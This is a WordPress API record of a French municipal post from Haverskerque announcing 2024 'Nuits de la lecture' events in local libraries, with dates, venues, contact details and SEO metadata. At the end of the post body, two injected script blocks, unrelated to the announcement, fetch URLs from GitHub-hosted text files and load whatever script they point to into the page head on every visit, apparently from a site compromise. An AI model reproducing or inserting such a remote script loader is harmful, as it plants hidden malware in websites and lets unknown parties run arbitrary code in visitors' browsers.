{"id":5982,"date":"2023-12-21T12:08:52","date_gmt":"2023-12-21T11:08:52","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=5982"},"modified":"2024-07-29T06:37:39","modified_gmt":"2024-07-29T04:37:39","slug":"nuits-de-la-lecture-2024","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/","title":{"rendered":"Nuits de la lecture 2024"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/barbry.esy.es\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1-723x1024.png\" alt=\"\" class=\"wp-image-5981\" width=\"223\" height=\"316\" srcset=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1-723x1024.png 723w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1-212x300.png 212w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1-768x1087.png 768w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1.png 866w\" sizes=\"auto, (max-width: 223px) 100vw, 223px\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Dans les m\u00e9diath\u00e8ques du r\u00e9seau l\u2019Esperluette.<\/p>\n\n\n\n<p><strong>FLEURBAIX<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>20 janvier de 16h \u00e0 18h<br>Le Corps et l\u2019Esprit \u2013 atelier Qi Gong \u2013 adultes<br>R\u00e9servation en biblioth\u00e8que ou culture@fleurbaix.fr<\/li>\n\n\n\n<li>20 janvier de 18h30 \u00e0 19h30<br>Une heure du conte \u2013 Ton corps\u2026 enfants de 3 \u00e0 6 ans<br>R\u00e9servation : biblioth\u00e8que ou culture@fleurbaix.fr<\/li>\n<\/ul>\n\n\n\n<p><strong>HAVERSKERQUE<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>19 janvier de 18h \u00e0 19h<\/strong><br><strong>Atelier Bien-\u00eatre en Duo \u2013 lecture, jeu, massage \u2013 enfants de 5 \u00e0 11 ans<\/strong><br><strong>accompagn\u00e9s d\u2019un parent ou grand-parent<\/strong><br><strong>medialys@haverskerque.fr et t\u00e9l\u00e9phone : 06-07-65-78-66<\/strong><\/li>\n\n\n\n<li><strong>20 janvier de 10h \u00e0 11h30<\/strong><br><strong>Lecture Yoga \u2013 adultes<\/strong><br><strong>R\u00e9servation : medialys@haverskerque.fr et t\u00e9l\u00e9phone : 06-07-65-78-66<\/strong><\/li>\n<\/ul>\n\n\n\n<p><strong>LA GORGUE<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>20 janvier \u00e0 18h \u2013 Ecole de Musique Gaston Dubois Rue Mermoz<br>\u201cUn Beetween\u2026. Tout en \u00e9motions\u201d Faire corps avec le texte, faire corps avec<br>la musique, faire corps avec la danse ! \u201d \u2013 Sans r\u00e9servation<\/li>\n<\/ul>\n\n\n\n<p><strong>LAVENTIE<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>20 janvier de 17h \u00e0 19h Impromptus cirque<br>\u00e0 20h Soir\u00e9e cin\u00e9ma<br>R\u00e9servation : mediatheque@laventie.fr ou 03 21 26 12 77<\/li>\n<\/ul>\n\n\n\n<p><strong>MERVILLE<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>20 janvier d\u00e8s 18h30<br>Ateliers sur le th\u00e8me du corps (quiz, lecture, jeux\u2026) et moment de<br>convivialit\u00e9 (auberge espagnole) tout public<br>R\u00e9servation : 03 28 48 95 10<\/li>\n<\/ul>\n\n\n\n<p><strong>SAILLY-SUR-LA-LYS<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>20 janvier de 9h30 \u00e0 12h30<br>Atelier Cirque<br>R\u00e9servation : biblioth\u00e8que ou 03 21 27 64 05 choix n\u00b06 ou biblio@sailly.info<\/li>\n<\/ul>\n\n\n\n<p><strong>ESTAIRES<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Programme \u00e0 venir sur le site de la commune.<\/li>\n<\/ul>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>Dans les m\u00e9diath\u00e8ques du r\u00e9seau l\u2019Esperluette. FLEURBAIX HAVERSKERQUE LA GORGUE LAVENTIE MERVILLE SAILLY-SUR-LA-LYS ESTAIRES<\/p>\n","protected":false},"author":2,"featured_media":5981,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[7],"tags":[],"class_list":["post-5982","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-rendez-vous"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Nuits de la lecture 2024 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nuits de la lecture 2024 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"Dans les m\u00e9diath\u00e8ques du r\u00e9seau l\u2019Esperluette. FLEURBAIX HAVERSKERQUE LA GORGUE LAVENTIE MERVILLE SAILLY-SUR-LA-LYS ESTAIRES\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2023-12-21T11:08:52+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:37:39+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"866\" \/>\n\t<meta property=\"og:image:height\" content=\"1226\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Communication\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Communication\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/\"},\"author\":{\"name\":\"Communication\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/aafb858b21dd4f2d37a7ab8c59b836ad\"},\"headline\":\"Nuits de la lecture 2024\",\"datePublished\":\"2023-12-21T11:08:52+00:00\",\"dateModified\":\"2024-07-29T04:37:39+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/\"},\"wordCount\":208,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/12\\\/nuits-de-la-lecture-2024_1.png\",\"articleSection\":[\"Rendez-vous\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/\",\"name\":\"Nuits de la lecture 2024 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/12\\\/nuits-de-la-lecture-2024_1.png\",\"datePublished\":\"2023-12-21T11:08:52+00:00\",\"dateModified\":\"2024-07-29T04:37:39+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/12\\\/21\\\/nuits-de-la-lecture-2024\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Nuits de la lecture 2024\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/aafb858b21dd4f2d37a7ab8c59b836ad\",\"name\":\"Communication\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g\",\"caption\":\"Communication\"},\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/clement\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Nuits de la lecture 2024 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/","og_locale":"fr_FR","og_type":"article","og_title":"Nuits de la lecture 2024 * Haverskerque, 100% Nature !*","og_description":"Dans les m\u00e9diath\u00e8ques du r\u00e9seau l\u2019Esperluette. FLEURBAIX HAVERSKERQUE LA GORGUE LAVENTIE MERVILLE SAILLY-SUR-LA-LYS ESTAIRES","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2023-12-21T11:08:52+00:00","article_modified_time":"2024-07-29T04:37:39+00:00","og_image":[{"width":866,"height":1226,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1.png","type":"image\/png"}],"author":"Communication","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Communication","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/"},"author":{"name":"Communication","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/aafb858b21dd4f2d37a7ab8c59b836ad"},"headline":"Nuits de la lecture 2024","datePublished":"2023-12-21T11:08:52+00:00","dateModified":"2024-07-29T04:37:39+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/"},"wordCount":208,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1.png","articleSection":["Rendez-vous"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/","name":"Nuits de la lecture 2024 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/12\/nuits-de-la-lecture-2024_1.png","datePublished":"2023-12-21T11:08:52+00:00","dateModified":"2024-07-29T04:37:39+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/12\/21\/nuits-de-la-lecture-2024\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Nuits de la lecture 2024"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/aafb858b21dd4f2d37a7ab8c59b836ad","name":"Communication","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f1f32f6a5fe89824a018e48a8d0132dc8a2017a5c81ea8ad1f3bdfd5fe9dddc4?s=96&d=mm&r=g","caption":"Communication"},"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/clement\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/5982","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=5982"}],"version-history":[{"count":2,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/5982\/revisions"}],"predecessor-version":[{"id":8263,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/5982\/revisions\/8263"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/5981"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=5982"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=5982"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=5982"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}